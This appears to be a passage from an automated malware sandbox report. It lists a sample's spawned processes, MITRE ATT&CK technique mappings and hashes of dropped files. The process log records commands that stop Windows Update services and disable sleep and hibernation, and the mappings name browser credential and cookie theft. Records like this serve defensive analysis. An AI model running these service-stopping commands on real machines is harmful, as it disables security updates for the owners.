  C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe
    PID: 5848

  C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe
    PID: 3236

  C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe
    PID: 5056

  C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe
    PID: 1044

  C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    - Launches sc.exe
    PID: 1612

  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID: 4976

  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID: 6068

  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID: 3892

  C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID: 4412

  C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe
    PID: 5288

  C:\Windows\explorer.exe
    explorer.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 5216

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
  PID: 2892

Network
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- System Services (2)
  - Service Execution (2)

Persistence
- Create or Modify System Process (2)
  - Windows Service (2)
- Modify Authentication Process (1)
- Power Settings (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Privilege Escalation
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (4)
  - Credentials In Files (4)

Downloads

- Filesize: 649B
  MD5: 1a04986d6bc05730bbbfe8c0c5eeb499
  SHA1: 84052221402b534865379e9379d6adb43e886c69
  SHA256: f7714af398e7364bc602be4c25dfb5deea91d8f505050f3c57abb2fd080c7b1c
  SHA512: a4bd58b4a74a294cf2868f963085dee0a97fb24434ace40570e9873ef552685f9f992be28ad74e92ff0b87f1c8cd7ee4d57476511adc696a5a3af943e24cf61b

- Filesize: 2B
  MD5: d751713988987e9331980363e24189ce
  SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
  SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
  SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

- Filesize: 80KB
  MD5: 16a352d5425333de472b9c0754a78efb
  SHA1: 68835af77fe5e5c862113dc38259595d478017f9
  SHA256: bfa6c370310c7aa25019f66862ad4c8f8bb1cc55cebb8cc4edc8bd86e204dfdf
  SHA512: e3a584844332e2b3501349cfaceedbbf8ae27c76f39fc27ab413ff0f57755868b798378853c834f47f32883d228ae30b0c013d2634ba265461a9420c16a405bd

- Filesize: 2KB
  MD5: 627073ee3ca9676911bee35548eff2b8
  SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
  SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
  SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

- Filesize: 280B
  MD5: 8272581d8cb38484cc8cb6afbdd0d37e
  SHA1: 2baa96a0439003aabaad1ce5619ea0a581cf261a
  SHA256: 025356bf819ea8a5da44ac2c4510bc380a9448247a30665577430ca7a44ca297
  SHA512: 60574186c595b0018d9223afd38e59378b1b00ef4f39be17ef2d7613cdac5b8f9e6dc3f2efefd559a0e4e8d64884d6ea155e874df13f170bb6dfbb41a0104959

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\8dfbd068-7047-419b-a330-e451aba1a892.tmp
  Filesize: 1B
  MD5: 5058f1af8388633f609cadb75a75dc9d
  SHA1: 3a52ce780950d4d969792a2559cd519d7ee8c727
  SHA256: cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
  SHA512: 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\28dacc6d-8082-4aba-9cb9-067408b474cf\index-dir\the-real-index
  Filesize: 1KB
  MD5: ccc22c4a1b052bea208611eb21df6942
  SHA1: 68726b601f7a405af5f3b527827dfbc41af0e61b
  SHA256: 4883d67244bc7b37907b7a9eec8c0bcc4bae54ba6ae5ddac3debc2c187e22f41
  SHA512: d2cd41f7320c5a205b41f5d6af49a977e50db5ae21cb8503e9a6a38d6ee49c43352864cf3680f82cf8b96fa7bd89b0c8c2ab0374347009a2bb63e382e867c410

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\28dacc6d-8082-4aba-9cb9-067408b474cf\index-dir\the-real-index~RFe57d38c.TMP
  Filesize: 1KB
  MD5: 294555721e81c304398ae725019c770e
  SHA1: 730a46bb728c67f8f92839ad028f3939df26ed98
  SHA256: c5a626049db5ab20b647dc9cff5e7c67d973b72bd099c04f5ad2e9420024f4c6
  SHA512: e7eeb2cda818d0200d391651872244a7406f8024a6d8bbae3bb75db89a434c5a8840fa37b5872cb5fe712a11c7d6fbda00a0ad53dfecd074080342099270f8b3

- Filesize: 41KB
  MD5: f87360a58f9e3686862b8a51eb1ca380
  SHA1: aeb9f5544810d290df065599ca5594a49025b6c2
  SHA256: 881a5864231dc0814f186def4c919beea37ea122e3d1c97b8dc3abd11fe1b47b
  SHA512: c30d1f83d08bb9f434195c0538917913b648576e68665246367deaa5228f497972de12a2ce59f2c5aec858a33b946e611ac694d7d9e2566cbd3d2d7406425070

- Filesize: 944B
  MD5: 2e8eb51096d6f6781456fef7df731d97
  SHA1: ec2aaf851a618fb43c3d040a13a71997c25bda43
  SHA256: 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
  SHA512: 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

- Filesize: 1KB
  MD5: 0755abef639c3ab31c7314a31c7c2802
  SHA1: ee90bac1c2784e561b9a8b8dcae1c4bb8dd19e7f
  SHA256: eb5ca05cee810f18c8fe5f9a7b436f0c20493188449c3c2dffd573540f8331ab
  SHA512: 57d9a0ec8a95eae6f1a701377ee5d4fbcc9dd82ff265e88908484bed078ab5e4f04daab7eaa2a0daa0ec370c8151a415a294b487b190f0d2803f84f7fb7913a1

- Filesize: 1KB
  MD5: 1341538c485f016108427174050e0756
  SHA1: cbd8d0e423c85c23a0e66523b0c360a0e3947795
  SHA256: 9a7d7c0e88e2e2ec0b53e7a0194fa49bcc5b4609f6d4c9352d04f51319e376d6
  SHA512: 3a5440defa51a6dfb507e62e6bd42c48a9e0f4c9a670bda51974c51da500247bac784b4aa98044d1fd87beb5c2272281da86b0b3a044102a94e6ba6c91265d5c

- Filesize: 793B
  MD5: 53618a671637ae86e239a3776198bdc3
  SHA1: 3d175f84b5db61578dc3bdaa3e69524143442510
  SHA256: 9c721917fd88c2b9b213dfa51a33f9fe670696ef9aa467a7f966d8c1721fcc4d
  SHA512: 5e7017df509539de144450f13ceb94bae1c69c72ca1194c66eb2c4bb3524ef53750ee50246dde3c9bc8180b48fecb6389beb6c8644f461db1f2c912932f5e312

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- C:\Users\Admin\AppData\Local\Temp\scoped_dir5808_1628410771\97415e5d-d4d0-4d0e-a4ff-79331c6b3abd.tmp
  Filesize: 152KB
  MD5: dd9bf8448d3ddcfd067967f01e8bf6d7
  SHA1: d7829475b2bd6a3baa8fabfaf39af57c6439b35e
  SHA256: fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
  SHA512: 65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

- Filesize: 137KB
  MD5: e08490aaa588933433f6b7d3ffbae613
  SHA1: 2b4d7cf90e3e9b41f070194bc6dd811ef60014d4
  SHA256: 0476c1b47571e408cdaeae24a30e481fc0955989e64791e505f7de6d391c1048
  SHA512: 8c67fd88a91314594137dc50a4e81deb96ffb093469cc6b04ca3c4b7e62e6f41b3dd40c47924937fbca202144958068e6c4d0b258ec4469b7f536bb37142f7c9

- Filesize: 5.1MB
  MD5: cb1ab881df77d5e59c9cd71a042489dd
  SHA1: 948c65951d6f888dacb567d9938bb21492d82097
  SHA256: 23fa323eea0a8a6367e810996a54337197c1750a9a0a53c306c8c4022dd94780
  SHA512: 84a1030a3d2f55ad6fc576bb122d98428485986c1fe4bbd41e13ac1ce588dc3f1034fbe18139f23f9422d520815b4e437b6ac7b78960d0b6c52c56acb87f9c31

- Filesize: 27KB
  MD5: 2ff8e057084b5c180e9b447e08d2d747
  SHA1: 92b35c1b8f72c18dd3e945743cb93e8531d73e2b
  SHA256: accdada8772018e58baa0ecb3e79c507eb09c7d67f22f59e323c74b51eac9072
  SHA512: 7ae542c6ca36e5ed934ca503f3489144e0ec7d81ad246af88bb525cb494f6725df0aa9131c72afe79ff02364dd65ec7a3ffb01846f99836feff06746193af251

- Filesize: 3KB
  MD5: 00930b40cba79465b7a38ed0449d1449
  SHA1: 4b25a89ee28b20ba162f23772ddaf017669092a5
  SHA256: eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
  SHA512: cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62